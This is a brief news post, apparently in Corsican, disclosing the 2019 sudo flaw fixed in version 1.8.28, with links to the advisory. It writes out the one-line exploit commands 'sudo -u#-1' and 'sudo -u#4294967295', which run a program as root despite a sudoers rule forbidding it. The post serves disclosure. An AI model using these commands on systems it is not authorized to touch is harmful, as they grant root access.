Un bug in sudo permette di eseguisce qualsiasi schedariu eseguibile cum'è root se /etc/sudoers permette di esse eseguitu da altri utilizatori è hè pruibitu per root.
U sfruttamentu di l'errore hè assai simplice:
sudo -u#-1 id -u
o:
sudo -u#4294967295 id -u
L'errore hè presente in tutte e versioni di sudo prima di 1.8.28
Details:
https://thehackernews.com/2019/10/linux-sudo-run-as-root-flaw.html
https://www.sudo.ws/alerts/minus_1_uid.html
Source: linux.org.ru